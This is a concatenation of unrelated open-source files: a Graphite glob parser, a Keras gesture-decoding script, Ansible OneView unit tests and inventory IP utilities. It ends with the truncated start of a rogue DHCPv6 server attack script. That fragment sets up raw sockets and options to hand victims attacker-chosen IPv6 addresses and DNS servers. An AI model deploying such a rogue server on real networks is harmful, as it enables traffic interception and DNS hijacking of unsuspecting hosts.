"""Convert a Graphite globbing pattern into a regular expression.
This function does not check for glob validity, if you want usable regexes
then you must check _is_valid_glob() first.
Uses _tokenize() to obtain a token stream, then does simple substitution
from token type and data to equivalent regular expression.
It handles * as being anything except a dot.
It returns a regex that only matches whole strings (i.e. ^regex$).
Args:
glob: Valid Graphite glob pattern.
Returns:
Regex corresponding to the provided glob.
"""
ans = ""
for token, data in tokenize(glob):
if token == TokenType.PATH_SEPARATOR:
ans += re.escape('.')
elif token == TokenType.LITERAL:
ans += re.escape(data)
elif token == TokenType.WILD_CHAR:
ans += "."
elif token == TokenType.WILD_SEQUENCE:
ans += "[^.]*"
elif token == TokenType.WILD_PATH:
ans += ".*"
elif token == TokenType.CHAR_SELECT_BEGIN:
ans += "["
elif token == TokenType.CHAR_SELECT_NEGATED_BEGIN:
ans += "[^"
elif token == TokenType.CHAR_SELECT_RANGE_DASH:
ans += "-"
elif token == TokenType.CHAR_SELECT_END:
ans += "]"
elif token == TokenType.EXPR_SELECT_BEGIN:
ans += "("
elif token == TokenType.EXPR_SELECT_SEPARATOR:
ans += "|"
elif token == TokenType.EXPR_SELECT_END:
ans += ")"
else:
raise Exception("Unexpected token type '%s' with data '%s'" % (token, data))
return '^' + ans + '$'
def glob(metric_names, glob_pattern):
"""Pre-filter metric names according to a glob expression.
Uses the dot-count and the litteral components of the glob to filter
guaranteed non-matching values out, but may still require post-filtering.
Args:
metric_names: List of metric names to be filtered.
glob_pattern: Glob pattern.
Returns:
List of metric names that may be matched by the provided glob.
"""
glob_components = glob_pattern.split(".")
globstar = None
prefix_literals = []
suffix_literals = []
for (index, component) in enumerate(glob_components):
if component == "**":
globstar = index
elif globstar:
# Indexed relative to the end because globstar length is arbitrary
suffix_literals.append((len(glob_components) - index, component))
elif not _is_graphite_glob(component):
prefix_literals.append((index, component))
def maybe_matched_prefilter(metric):
metric_components = metric.split(".")
if globstar:
if len(metric_components) < len(glob_components):
return False
elif len(metric_components) != len(glob_components):
return False
for (index, value) in itertools.chain(suffix_literals, prefix_literals):
if metric_components[index] != value:
return False
return True
return filter(maybe_matched_prefilter, metric_names)
def graphite_glob(accessor, graphite_glob, metrics=True, directories=True):
"""Get metrics and directories matching a Graphite glob.
Args:
accessor: BigGraphite accessor
graphite_glob: Graphite glob expression
metrics: True if metrics should be fetched
directories: True if directories should be fetched
Returns:
A tuple:
First element: sorted list of Cassandra metrics matched by the glob.
Second element: sorted list of Cassandra directories matched by the glob.
"""
if not _is_valid_glob(graphite_glob):
# TODO(d.forest): should we instead raise an exception?
return ([], [])
glob_re = re.compile(_glob_to_regex(graphite_glob))
if metrics:
metrics = accessor.glob_metric_names(graphite_glob)
metrics = filter(glob_re.match, metrics)
else:
metrics = []
if directories:
directories = accessor.glob_directory_names(graphite_glob)
directories = filter(glob_re.match, directories)
else:
directories = []
return (metrics, directories)
class GlobExpression:
"""Base class for glob expressions."""
def __repr__(self):
return self.__class__.__name__
def __eq__(self, other):
return self.__class__ == other.__class__
class GlobExpressionWithValues(GlobExpression):
"""Base class for glob expressions that have values."""
def __init__(self, values):
"""Take a list of values, and stores the sorted unique values."""
self.values = sorted(set(values))
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, self.values)
def __eq__(self, other):
return (GlobExpression.__eq__(self, other) and
self.values == other.values)
class Globstar(GlobExpression):
"""Represents a globstar wildcard."""
pass
class AnyChar(GlobExpression):
"""Represents any single character."""
pass
class AnySequence(GlobExpression):
"""Represents any sequence of 0 or more characters."""
pass
class SequenceIn(GlobExpressionWithValues):
"""Represents a choice between different character sequences."""
pass
class GraphiteGlobParser:
"""Utility class for parsing graphite glob expressions."""
# TODO(d.forest): upgrade to new tokenizer here
# TODO(d.forest): after upgrade, try to improve Cassandra query generation
def __init__(self):
"""Build a parser, fill in default values."""
self._reset('')
def _commit_sequence(self):
if len(self._sequence) > 0:
self._component.append(self._sequence)
self._sequence = ''
def _commit_component(self):
self._commit_sequence()
if len(self._component) > 0:
self._parsed.append(self._component)
self._component = []
def _parse_char_wildcard(self):
"""Parse single character wildcard."""
self._commit_sequence()
self._component.append(AnyChar())
def _parse_wildcard(self, i, n):
"""Parse multi-character wildcard, and globstar."""
self._commit_sequence()
# Look-ahead for potential globstar
if i < n and self._glob[i] == '*':
self._commit_component()
self._parsed.append(Globstar())
i += 1
else:
self._component.append(AnySequence())
return i
def _find_char_selector_end(self, i, n):
"""Find where a character selector expression ends."""
j = i
if j < n and self._glob[j] == '!':
j += 1
if j < n and self._glob[j] == ']':
j += 1
j = self._glob.find(']', j)
if j == -1:
return n
return j
def _parse_char_selector(self, i, n):
"""Parse character selector, with support for negation and ranges.
For simplicity (and because it does not seem useful at the moment) we
will not be generating the possible values or parsing the ranges, but
outputting AnyChar on valid char selector expressions.
"""
j = self._find_char_selector_end(i, n)
if j < n:
# +1 to skip closing bracket
i = j + 1
self._commit_sequence()
self._component.append(AnyChar())
else:
# Reached end of string: unbalanced bracket
self._sequence += '['
return i
def _parse_sequence_selector(self, i, n):
"""Parse character sequence selector, with support for nesting.
For simplicity, we will be outputting AnySequence in situations where
values contain a character selector.
"""
result = self._parse_sequence_selector_values(i, n)
if result:
has_char_selector, i, values = result
if not has_char_selector and len(values) == 1:
self._sequence += values[0]
else:
if has_char_selector:
seq = AnySequence()
else:
seq = SequenceIn(values)
self._commit_sequence()
self._component.append(seq)
else:
self._sequence += '{'
return i
def _parse_sequence_selector_values(self, i, n):
has_char_selector = False
values = []
curr = []
tmp = ''
j = i
c = ''
while j < n and c != '}':
c = self._glob[j]
j += 1
# Parse sub-expression then combine values with prefixes.
if c == '{':
if tmp != '':
curr.append(tmp)
tmp = ''
result = self._parse_sequence_selector_values(j, n)
if not result:
return None
has_charsel, j, subvalues = result
has_char_selector = has_char_selector or has_charsel
curr = [prefix + x for prefix in curr for x in subvalues]
# End of current element, combine values with suffix.
elif c == ',' or c == '}':
if len(curr) > 0:
values += [x + tmp for x in curr]
else:
values.append(tmp)
curr = []
tmp = ''
# Simplified handling of char selector
elif c == '[':
# XXX(d.forest): We could keep track of depth and just make sure
# the selector expression is well-formed instead
# of continuing to parse everything.
# This is open for later improvement.
k = self._find_char_selector_end(j, n)
if k < n:
has_char_selector = True
j = k + 1
else:
tmp += '['
# Reject dots inside selectors
elif c == '.':
return None
# Append char to the current value.
else:
tmp += c
# We have reached the end without finding a closing brace: the braces
# are unbalanced, expression cannot be parsed as a sequence selector.
if j == n and c != '}':
return None
return has_char_selector, j, values + curr
def _reset(self, glob):
self._glob = glob
self._parsed = []
self._component = []
self._sequence = ''
def parse(self, glob):
"""Parse a graphite glob expression into simple components."""
self._reset(glob)
i = 0
n = len(self._glob)
while i < n:
c = self._glob[i]
i += 1
if c == '?':
self._parse_char_wildcard()
elif c == '*':
i = self._parse_wildcard(i, n)
elif c == '[':
i = self._parse_char_selector(i, n)
elif c == '{':
i = self._parse_sequence_selector(i, n)
elif c == '.':
self._commit_component()
else:
self._sequence += c
self._commit_component()
return self._parsed
| apache-2.0 | -4,000,647,928,094,152,000 | 29.75969 | 88 | 0.550718 | false |
AlexGidiotis/Multimodal-Gesture-Recognition-with-LSTMs-and-CTC | multimodal_fusion/sequence_decoding.py | 1 | 3585 |
import pandas as pd
import numpy as np
from operator import itemgetter
from itertools import groupby
from keras.preprocessing import sequence
from keras.models import Sequential
from keras.models import model_from_json
from keras import backend as K
from keras.optimizers import RMSprop
import keras.callbacks
from keras.layers import Input, Lambda
from keras.models import Model
import itertools
from sklearn import preprocessing
from data_generator import DataGenerator
from losses import ctc_lambda_func
def decode_batch(pred_out,f_list):
"""
"""
# Map gesture codes to classes.
map_gest = {0:"oov", 1:"VA", 2:"VQ", 3:"PF", 4:"FU", 5:"CP", 6:"CV",
7:"DC", 8:"SP", 9:"CN", 10:"FN", 11:"OK", 12:"CF", 13:"BS",
14:"PR", 15:"NU", 16:"FM", 17:"TT", 18:"BN", 19:"MC",
20:"ST", 21:"sil"}
# These files are problematic during decoding.
ignore_list = [228,298,299,300,303,304,334,343,373,375]
# Write the output to .mlf
of = open('final_ctc_recout.mlf', 'w')
of.write('#!MLF!#\n')
out = pred_out
ret = []
for j in range(out.shape[0]):
out_prob = list(np.max(out[j, 2:],1))
out_best = list(np.argmax(out[j, 2:],1))
# Filter the probabilities to get the most confident predictions.
for p,s in zip(out_prob,out_best):
if p < 0.5:
out_prob.remove(p)
out_best.remove(s)
out_best = [k for k, g in itertools.groupby(out_best)]
outstr = [map_gest[i] for i in out_best]
ret.append(outstr)
f_num = f_list[j]
if int(f_num) in ignore_list:
continue
fileNum = str(format(f_num, '05'))
fileName = 'Sample'+fileNum
of.write('"*/%s.rec"\n' %fileName)
for cl in outstr:
of.write('%s\n' %cl)
of.write('.\n')
of.close()
return ret
if __name__ == '__main__':
minibatch_size = 2
maxlen = 1900
nb_classes = 22
nb_epoch = 100
numfeats_speech = 39
numfeats_skeletal = 20
K.set_learning_phase(0)
dataset = raw_input('select train or val: ')
data_gen = DataGenerator(minibatch_size=minibatch_size,
numfeats_speech=numfeats_speech,
numfeats_skeletal=numfeats_skeletal,
maxlen=maxlen,
nb_classes=nb_classes,
dataset=dataset)
input_shape_a = (maxlen, numfeats_speech)
input_shape_s = (maxlen, numfeats_skeletal)
input_data_a = Input(name='the_input_audio', shape=input_shape_a, dtype='float32')
input_data_s = Input(name='the_input_skeletal', shape=input_shape_s, dtype='float32')
json_file = open('multimodal_ctc_blstm_model.json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
loaded_model.load_weights("multimodal_ctc_lstm_weights_best.h5")
print("Loaded model from disk")
y_pred = loaded_model.get_layer('softmax').output
labels = Input(name='the_labels', shape=[data_gen.absolute_max_sequence_len], dtype='float32')
input_length = Input(name='input_length', shape=[1], dtype='int64')
label_length = Input(name='label_length', shape=[1], dtype='int64')
loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name="ctc")([y_pred, labels, input_length, label_length])
rmsprop = RMSprop(lr=0.001, clipnorm=5)
# the loss calc occurs elsewhere, so use a dummy lambda func for the loss
loaded_model.compile(loss={'ctc': lambda y_true, y_pred: y_pred}, optimizer=rmsprop)
pred_model = Model(inputs=loaded_model.input,
outputs=loaded_model.get_layer('softmax').output)
predictions = pred_model.predict_generator(generator=data_gen.next_val(),
steps=data_gen.get_size(train=False)/minibatch_size,
verbose=1)
f_list = data_gen.get_file_list(train=False)
decoded_res = decode_batch(predictions, f_list)
| mit | 6,923,407,496,692,858,000 | 27.228346 | 112 | 0.68954 | false |
HewlettPackard/oneview-ansible | test/test_oneview_scope.py | 1 | 11066 | #!/usr/bin/python
# -*- coding: utf-8 -*-
###
# Copyright (2016-2020) Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
import copy
import mock
import pytest
from hpe_test_utils import OneViewBaseTest
from oneview_module_loader import ScopeModule
FAKE_MSG_ERROR = 'Fake message error'
RESOURCE = dict(name='ScopeName', uri='/rest/scopes/id')
RESOURCE_UPDATED = dict(name='ScopeNameRenamed', uri='/rest/scopes/id')
RESOURCE_ASSIGNMENTS = dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-4'])
PARAMS_FOR_PRESENT = dict(
config='config.json',
state='present',
data=dict(name='ScopeName')
)
PARAMS_WITH_CHANGES = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
newName='ScopeNameRenamed')
)
PARAMS_WITH_CHANGES_HAVING_RESOURCES_1 = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-3'])
)
PARAMS_WITH_CHANGES_HAVING_RESOURCES_2 = dict(
config='config.json',
state='present',
data=dict(name='ScopeName',
addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-2'])
)
PARAMS_FOR_ABSENT = dict(
config='config.json',
state='absent',
data=dict(name='ScopeName')
)
PARAMS_RESOURCE_ASSIGNMENTS = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(addedResourceUris=['/rest/resource/id-1', '/rest/resource/id-2'],
removedResourceUris=['/rest/resource/id-3']))
)
PARAMS_NO_RESOURCE_ASSIGNMENTS = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(addedResourceUris=None,
removedResourceUris=None))
)
@pytest.mark.resource(TestScopeModule='scopes')
class TestScopeModule(OneViewBaseTest):
def test_should_create_new_scope_when_not_found(self):
self.resource.get_by_name.return_value = None
self.resource.create.return_value = self.resource
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_PRESENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_CREATED,
ansible_facts=dict(scope=PARAMS_FOR_PRESENT)
)
def test_should_not_update_when_data_is_equals(self):
response_data = PARAMS_FOR_PRESENT['data']
self.resource.data = response_data
self.mock_ansible_module.params = PARAMS_FOR_PRESENT
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=ScopeModule.MSG_ALREADY_PRESENT,
ansible_facts=dict(scope=response_data)
)
def test_should_not_update_when_no_new_add_remove_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(PARAMS_WITH_CHANGES_HAVING_RESOURCES_1['data'])
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_1
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_new_remove_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(PARAMS_WITH_CHANGES_HAVING_RESOURCES_2['data'])
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_2
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_new_add_resources(self):
self.resource.get_by_name.return_value = self.resource
current_data = copy.deepcopy(RESOURCE_ASSIGNMENTS)
self.resource.data = current_data
self.mock_ansible_module.params = PARAMS_WITH_CHANGES_HAVING_RESOURCES_1
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=current_data)
)
def test_should_update_when_data_has_changes(self):
data_merged = PARAMS_FOR_PRESENT.copy()
data_merged['name'] = 'ScopeNameRenamed'
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = PARAMS_WITH_CHANGES
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_UPDATED,
ansible_facts=dict(scope=PARAMS_FOR_PRESENT)
)
def test_should_remove_scope_when_found(self):
self.resource.get_by_name.return_value = self.resource
self.resource.data = PARAMS_FOR_PRESENT
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_ABSENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
msg=ScopeModule.MSG_DELETED
)
def test_should_not_delete_when_scope_not_found(self):
self.resource.get_by_name.return_value = None
self.mock_ansible_module.params = copy.deepcopy(PARAMS_FOR_ABSENT)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
msg=ScopeModule.MSG_ALREADY_ABSENT
)
def test_should_fail_resource_assignments_when_scope_not_found(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = None
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
failed=True,
changed=False,
msg=ScopeModule.MSG_RESOURCE_NOT_FOUND
)
def test_should_not_update_resource_assignments_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
resource_data = PARAMS_NO_RESOURCE_ASSIGNMENTS.copy()
self.resource.data = resource_data
self.resource.update_resource_assignments.return_value = self.resource
self.mock_ansible_module.params = copy.deepcopy(PARAMS_NO_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=False,
ansible_facts=dict(scope=PARAMS_NO_RESOURCE_ASSIGNMENTS),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_NOT_UPDATED
)
def test_should_add_and_remove_resource_assignments_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
resource_data = PARAMS_RESOURCE_ASSIGNMENTS.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
def test_should_update_name_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(name='TestScope'))
)
resource_data = PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_NAME),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
def test_should_update_description_in_api300(self):
self.mock_ov_client.api_version = 300
self.resource.get_by_name.return_value = self.resource
PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION = dict(
config='config.json',
state='resource_assignments_updated',
data=dict(name='ScopeName',
resourceAssignments=dict(description='Test'))
)
resource_data = PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION.copy()
self.resource.data = resource_data
patch_return = resource_data.copy()
patch_return['scopeUris'] = ['test']
patch_return_obj = self.resource.copy()
patch_return_obj.data = patch_return
self.resource.patch.return_value = patch_return_obj
self.mock_ansible_module.params = copy.deepcopy(PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION)
ScopeModule().run()
self.mock_ansible_module.exit_json.assert_called_once_with(
changed=True,
ansible_facts=dict(scope=PARAMS_RESOURCE_ASSIGNMENTS_UPDATED_DESCRIPTION),
msg=ScopeModule.MSG_RESOURCE_ASSIGNMENTS_UPDATED
)
if __name__ == '__main__':
pytest.main([__file__])
| apache-2.0 | -3,200,483,235,945,231,000 | 34.928571 | 104 | 0.653895 | false |
rtucker-mozilla/mozilla_inventory | core/utils.py | 1 | 6521 | from django.db.models import Q
from django.core.exceptions import ValidationError
import ipaddr
import smtplib
from email.mime.text import MIMEText
from settings.local import people_who_need_to_know_about_failures
from settings.local import inventorys_email
# http://dev.mysql.com/doc/refman/5.0/en/miscellaneous-functions.html
# Prevent this case http://people.mozilla.com/~juber/public/t1_t2_scenario.txt
def locked_function(lock_name, timeout=10):
def decorator(f):
def new_function(*args, **kwargs):
from django.db import connection
cursor = connection.cursor()
cursor.execute(
"SELECT GET_LOCK('{lock_name}', {timeout});".format(
lock_name=lock_name, timeout=timeout
)
)
ret = f(*args, **kwargs)
cursor.execute(
"SELECT RELEASE_LOCK('{lock_name}');".format(
lock_name=lock_name
)
)
return ret
return new_function
return decorator
def fail_mail(content, subject='Inventory is having issues.',
to=people_who_need_to_know_about_failures,
from_=inventorys_email):
"""Send email about a failure."""
msg = MIMEText(content)
msg['Subject'] = subject
msg['From'] = inventorys_email
# msg['To'] = to
s = smtplib.SMTP('localhost')
s.sendmail(from_, to, msg.as_string())
s.quit()
class IPFilterSet(object):
"""The IPFilterSet expects that all IPFilters added to it are of the same
type. This might be useful later.
"""
def __init__(self):
self.ipfs = []
def add(self, ipf):
self.ipfs.append(ipf)
def pprint(self):
for ipf in self.ipfs:
print ipf
def pprint_intersect(self):
for intersect in self.calc_intersect():
print intersect
def calc_intersect(self):
"""
This is where the magic comes from. Given a list of IPFilter objects,
figure the ranges that are common to all the IPFilters, and create a
new list of IPFilter objects that represent this range.
"""
def trim(self, r, rs, ip_type):
if not (rs and r):
return r
r1 = rs[0]
rx = self.intersect(r, r1, ip_type)
return self.trim(rx, rs[1:], ip_type)
def intersect(self, r1, r2, ip_type):
"""Cases:
* Subset or equal
* Left intersect
* Right intersect
* No intersect
"""
if r1.start > r2.end:
return None
# We have intersection somewhere.
if r1.end == r2.end and r1.start == r1.end:
# r1 is subset of r2
# Low High
# r1 |---------|
# r2 |---------|
# rx |---------|
return r1
if r1.start > r2.start and r1.end < r2.end:
# r1 is subset of r2
# Low High
# r1 |-------|
# r2 |---------|
# rx |---------|
return r1
if r1.start > r2.start and r1.end > r2.start:
# Low High
# r1 |---------|
# r2 |---------|
# rx |------|
return IPFilter(None, ip_type, r1.start_upper, r1.start_lower,
r2.end_upper, r2.end_lower)
if r1.start < r2.start and r1.end < r2.end:
# Low High
# r1 |---------|
# r2 |---------|
# rx |------|
return IPFilter(None, ip_type, r2.start_upper, r2.start_lower,
r1.end_upper, r1.end_lower)
class IPFilter(object):
def __init__(self, start, end, ip_type, object_=None):
self.object_ = object_ # The composite object (it can be None)
self.ip_type = ip_type
self.start, self.end, self.Q = start_end_filter(start, end, ip_type)
def __str__(self):
return "{0} -- {1}".format(self.start, self.end)
def __repr__(self):
return str(self)
def start_end_filter(start, end, ip_type):
ip_type = ip_type
if ip_type == '6':
IPKlass = ipaddr.IPv6Address
elif ip_type == '4':
IPKlass = ipaddr.IPv4Address
istart = IPKlass(start)
iend = IPKlass(end)
if int(istart) == int(iend):
raise ValidationError("start and end cannot be equal")
elif int(istart) > int(iend):
raise ValidationError("start cannot be greater than end")
start_upper, start_lower = one_to_two(int(istart))
end_upper, end_lower = one_to_two(int(iend))
# Equal uppers. Lower must be within.
if start_upper == end_upper:
q = Q(ip_upper=start_upper,
ip_lower__gte=start_lower,
ip_lower__lte=end_lower,
ip_type=ip_type)
else:
q = Q(ip_upper__gt=start_upper, ip_upper__lt=end_upper,
ip_type=ip_type)
return istart, iend, q
def networks_to_Q(networks):
"""Take a list of network objects and compile a Q that matches any object
that exists in one of those networks."""
q = Q()
for network in networks:
network.update_ipf()
q = q | network.ipf.Q
return q
def two_to_four(start, end):
start_upper = start >> 64
start_lower = start & (1 << 64) - 1
end_upper = end >> 64
end_lower = end & (1 << 64) - 1
return start_upper, start_lower, end_upper, end_lower
def one_to_two(ip):
return (ip >> 64, ip & (1 << 64) - 1)
def two_to_one(upper, lower):
return long(upper << 64) + long(lower)
def four_to_two(start_upper, start_lower, end_upper, end_lower):
start = (start_upper << 64) + start_lower
end = (end_upper << 64) + end_lower
return start, end
def int_to_ip(ip, ip_type):
"""A wrapper that converts a 32 or 128 bit integer into human readable IP
format."""
if ip_type == '6':
IPKlass = ipaddr.IPv6Address
elif ip_type == '4':
IPKlass = ipaddr.IPv4Address
return str(IPKlass(ip))
def resolve_ip_type(ip_str):
if ip_str.find(':') > -1:
Klass = ipaddr.IPv6Network
ip_type = '6'
elif ip_str.find('.') > -1:
Klass = ipaddr.IPv4Network
ip_type = '4'
else:
Klass = None
ip_type = None
return ip_type, Klass
def to_a(text, obj):
return "<a href='{0}'>{1}</a>".format(obj.absolute_url(), text)
| bsd-3-clause | 522,087,460,123,051,500 | 28.776256 | 78 | 0.535501 | false |
Vladimir-Ivanov-Git/raw-packet | Scripts/DHCP/dhcpv6_rogue_server.py | 1 | 36326 | #!/usr/bin/env python
# region Import
from sys import path
from os.path import dirname, abspath
project_root_path = dirname(dirname(dirname(abspath(__file__))))
utils_path = project_root_path + "/Utils/"
path.append(utils_path)
from base import Base
from network import Ethernet_raw, IPv6_raw, ICMPv6_raw, UDP_raw, DHCPv6_raw
from tm import ThreadManager
from sys import exit
from argparse import ArgumentParser
from socket import socket, AF_PACKET, SOCK_RAW, htons
from random import randint
from time import sleep
from os import errno
import subprocess as sub
# endregion
# region Check user, platform and create threads
Base = Base()
Base.check_user()
Base.check_platform()
tm = ThreadManager(5)
# endregion
# region Parse script arguments
parser = ArgumentParser(description='DHCPv6 Rogue server')
parser.add_argument('-i', '--interface', help='Set interface name for send reply packets')
parser.add_argument('-p', '--prefix', type=str, help='Set network prefix', default='fd00::/64')
parser.add_argument('-f', '--first_suffix', type=int, help='Set first suffix client IPv6 for offering', default=2)
parser.add_argument('-l', '--last_suffix', type=int, help='Set last suffix client IPv6 for offering', default=255)
parser.add_argument('-t', '--target_mac', type=str, help='Set target MAC address', default=None)
parser.add_argument('-T', '--target_ipv6', type=str, help='Set client Global IPv6 address with MAC in --target_mac',
default=None)
parser.add_argument('-D', '--disable_dhcpv6', action='store_true', help='Do not use DHCPv6 protocol')
parser.add_argument('-d', '--dns', type=str, help='Set recursive DNS IPv6 address', default=None)
parser.add_argument('-s', '--dns_search', type=str, help='Set DNS search list', default="local")
parser.add_argument('--delay', type=int, help='Set delay between packets', default=1)
parser.add_argument('-q', '--quiet', action='store_true', help='Minimal output')
args = parser.parse_args()
# endregion
# region Print banner if argument quit is not set
if not args.quiet:
Base.print_banner()
# endregion
# region Set global variables
eth = Ethernet_raw()
ipv6 = IPv6_raw()
icmpv6 = ICMPv6_raw()
udp = UDP_raw()
dhcpv6 = DHCPv6_raw()
recursive_dns_address = None
target_mac_address = None
target_ipv6_address = None
first_suffix = None
last_suffix = None
clients = {}
icmpv6_router_solicitation_address = "33:33:00:00:00:02"
dhcpv6_requests_address = "33:33:00:01:00:02"
# endregion
# region Disable or Enable DHCPv6 protocol
disable_dhcpv6 = False
if args.disable_dhcpv6:
disable_dhcpv6 = True
# endregion
# region Get your network settings
if args.interface is None:
Base.print_warning("Please set a network interface for sniffing ICMPv6 and DHCPv6 requests ...")
current_network_interface = Base.netiface_selection(args.interface)
your_mac_address = Base.get_netiface_mac_address(current_network_interface)
if your_mac_address is None:
print Base.c_error + "Network interface: " + current_network_interface + " do not have MAC address!"
exit(1)
your_local_ipv6_address = Base.get_netiface_ipv6_link_address(current_network_interface)
if your_local_ipv6_address is None:
print Base.c_error + "Network interface: " + current_network_interface + " do not have IPv6 link local address!"
exit(1)
# endregion
# region Create raw socket
global_socket = socket(AF_PACKET, SOCK_RAW)
global_socket.bind((current_network_interface, 0))
# endregion
# region Set search domain and Network prefix
dns_search = args.dns_search
network_prefix = args.prefix
network_prefix_address = network_prefix.split('/')[0]
network_prefix_length = network_prefix.split('/')[1]
# endregion
# region Set target MAC and IPv6 address, if target IP is not set - get first and last suffix IPv6 address
# region Set target IPv6 address
if args.target_mac is not None:
target_mac_address = str(args.target_mac).lower()
# endregion
# region Target IPv6 is set
if args.target_ipv6 is not None:
if args.target_mac is not None:
if not Base.ipv6_address_validation(args.target_ipv6):
Base.print_error("Bad target IPv6 address in `-T, --target_ipv6` parameter: ", args.target_ipv6)
exit(1)
else:
target_ipv6_address = args.target_ipv6
clients[target_mac_address] = {'advertise address': target_ipv6_address}
else:
Base.print_error("Please set target MAC address (example: --target_mac 00:AA:BB:CC:DD:FF)" +
", for target IPv6 address: ", args.target_ipv6)
exit(1)
# endregion
# region Target IPv6 is not set - get first and last suffix IPv6 address
else:
# Check first suffix IPv6 address
if 1 < args.first_suffix < 65535:
first_suffix = args.first_suffix
else:
Base.print_error("Bad value `-f, --first_suffix`: ", args.first_suffix,
"; first suffix IPv6 address must be in range: ", "1 - 65535")
exit(1)
# Check last suffix IPv6 address
if args.last_suffix > first_suffix:
if 1 < args.last_suffix < 65535:
last_suffix = args.last_suffix
else:
Base.print_error("Bad value `-l, --last_suffix`: ", args.first_suffix,
"; last suffix IPv6 address must be in range: ", "1 - 65535")
exit(1)
else:
Base.print_error("Bad value `-l, --last_suffix`: ", args.first_suffix,
"; last suffix IPv6 address should be more first suffix IPv6 address: ", str(first_suffix))
exit(1)
# endregion
# endregion
# region Set recursive DNS server address
if args.dns is None:
recursive_dns_address = your_local_ipv6_address
else:
if Base.ipv6_address_validation(args.dns):
recursive_dns_address = args.dns
else:
Base.print_error("Bad DNS server IPv6 address in `--dns` parameter: ", args.dns)
exit(1)
# endregion
# region General output
if not args.quiet:
Base.print_info("Network interface: ", current_network_interface)
Base.print_info("Your MAC address: ", your_mac_address)
Base.print_info("Your link local IPv6 address: ", your_local_ipv6_address)
if target_mac_address is not None:
Base.print_info("Target MAC: ", target_mac_address)
if target_ipv6_address is not None:
Base.print_info("Target Global IPv6: ", target_ipv6_address)
else:
Base.print_info("First suffix offer IP: ", str(first_suffix))
